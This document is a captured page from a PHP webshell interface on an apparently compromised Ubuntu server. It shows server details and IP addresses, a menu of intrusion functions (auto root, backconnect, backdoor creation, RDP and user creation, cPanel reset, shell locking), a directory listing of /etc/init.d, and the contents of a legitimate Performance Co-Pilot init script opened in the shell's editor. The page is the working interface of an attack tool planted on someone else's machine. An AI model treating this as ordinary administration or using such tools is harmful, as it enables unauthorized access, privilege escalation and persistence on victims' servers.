Linux ubuntu 6.8.0-90-generic #91-Ubuntu SMP PREEMPT_DYNAMIC Tue Nov 18 14:14:30 UTC 2025 x86_64
nginx/1.24.0
: 67.217.245.49 | : 216.73.216.153
Cant Read [ /etc/named.conf ]
8.3.6
www-data
Bypass.pw
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
Backdoor Scanner
Backdoor Create
Alfa Webshell
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
etc /
init.d /
[ HOME SHELL ]
Name
Size
Permission
Action
apache-htcacheclean
2.43
KB
-rwxr-xr-x
apache2
7.95
KB
-rwxr-xr-x
apparmor
3.65
KB
-rwxr-xr-x
apport
2.22
KB
-rwxr-xr-x
auditd
3.54
KB
-rwxr-xr-x
clamav-freshclam
7.51
KB
-rwxr-xr-x
console-setup.sh
1.21
KB
-rwxr-xr-x
cron
3.03
KB
-rwxr-xr-x
cryptdisks
937
B
-rwxr-xr-x
cryptdisks-early
896
B
-rwxr-xr-x
dbus
3.08
KB
-rwxr-xr-x
grub-common
985
B
-rwxr-xr-x
iperf3
1.36
KB
-rwxr-xr-x
iscsid
1.48
KB
-rwxr-xr-x
keyboard-setup.sh
1.45
KB
-rwxr-xr-x
kmod
2
KB
-rwxr-xr-x
mariadb
8.26
KB
-rwxr-xr-x
nginx
4.47
KB
-rwxr-xr-x
open-iscsi
2.41
KB
-rwxr-xr-x
open-vm-tools
1.8
KB
-rwxr-xr-x
pcp
2.92
KB
-rwxr-xr-x
php8.3-fpm
4.19
KB
-rwxr-xr-x
plymouth
1.35
KB
-rwxr-xr-x
plymouth-log
760
B
-rwxr-xr-x
pmcd
16.98
KB
-rwxr-xr-x
pmie
2.49
KB
-rwxr-xr-x
pmlogger
2.56
KB
-rwxr-xr-x
pmproxy
2.5
KB
-rwxr-xr-x
procps
959
B
-rwxr-xr-x
rsync
4.31
KB
-rwxr-xr-x
screen-cleanup
1.19
KB
-rwxr-xr-x
ssh
3.96
KB
-rwxr-xr-x
sysstat
1.54
KB
-rwxr-xr-x
ufw
2.04
KB
-rwxr-xr-x
unattended-upgrades
1.36
KB
-rwxr-xr-x
uuidd
1.28
KB
-rwxr-xr-x
vnstat
1.55
KB
-rwxr-xr-x
vsftpd
2.02
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : pcp
#!/bin/sh # # Copyright (c) 2011 Ken McDonell. All Rights Reserved. # # This program is free software; you can redistribute it and/or modify it # under the terms of the GNU General Public License as published by the # Free Software Foundation; either version 2 of the License, or (at your # option) any later version. # # This program is distributed in the hope that it will be useful, but # WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY # or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License # for more details. # # You should have received a copy of the GNU General Public License along # with this program; if not, write to the Free Software Foundation, Inc., # 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA # # Legacy wrapper for the Performance Co-Pilot Daemon(s) Start / Stop scripts # # This script is NOT part of the "rc" framework ... the "pmcd" and "pmlogger" # scripts ARE part of the "rc" framework. This script is provided as a # legacy bridge for any scripts or procedures that used $PCP_RC_DIR/pcp # from the days before PCP 3.6. # # The following is for chkconfig on RedHat based systems # chkconfig: # description: Legacy init script wrapper for the Performance Co-Pilot (PCP) daemons # # The following is for insserv(1) based systems, # e.g. SuSE, where chkconfig is a perl script. ### BEGIN INIT INFO # Provides: pcp # Required-Start: # Should-Start: # Required-Stop: # Should-Stop: # Default-Start: # Default-Stop: # Short-Description: Legacy control for PCP daemons # Description: Legacy init script wrapper for the Performance Co-Pilot (PCP) daemons ### END INIT INFO . $PCP_DIR/etc/pcp.env # for chasing arguments we're passed from init/systemd/... # #debug# echo "$*: `date`" >>$PCP_LOG_DIR/rc_pcp.log #debug# env >>$PCP_LOG_DIR/rc_pcp.log tmp=`mktemp -d "$PCP_TMPFILE_DIR/pcp_rc.XXXXXXXXX"` || exit 1 status=0 trap "rm -rf $tmp; exit \$status" 0 1 2 3 15 prog=$PCP_RC_DIR/pcp _usage() { echo "Usage: $pmprog [-v] {start|restart|condrestart|stop|status|reload|force-reload}" } # wrapper for PCP daemon init scripts ... use systemctl if available, # else run the PCP scripts directly # # Usage: _service <service> [on|off|restart|...] # _service() { if [ $# -ne 2 ] then echo "_service: expect 2 arguments, not $# ($*)" exit fi if [ -n "$PCP_SYSTEMDUNIT_DIR" -a -f $PCP_SYSTEMDUNIT_DIR/$1.service -a "$PCPQA_SYSTEMD" != no ] then # smells like systemctl is the go ... # systemctl $2 $1.service elif [ -f $PCP_RC_DIR/$1 ] then $PCP_RC_DIR/$1 $2 else echo "_service: $1 is not a systemctl service nor a $PCP_RC_DIR script!" exit fi } case "$1" in 'start'|'restart'|'condrestart'|'reload'|'force-reload') _service pmcd $* _service pmlogger $* ;; 'stop') _service pmlogger $* _service pmcd $* ;; 'status') _service pmcd $* || status=$? _service pmlogger $* || status=$? ;; *) _usage ;; esac
Close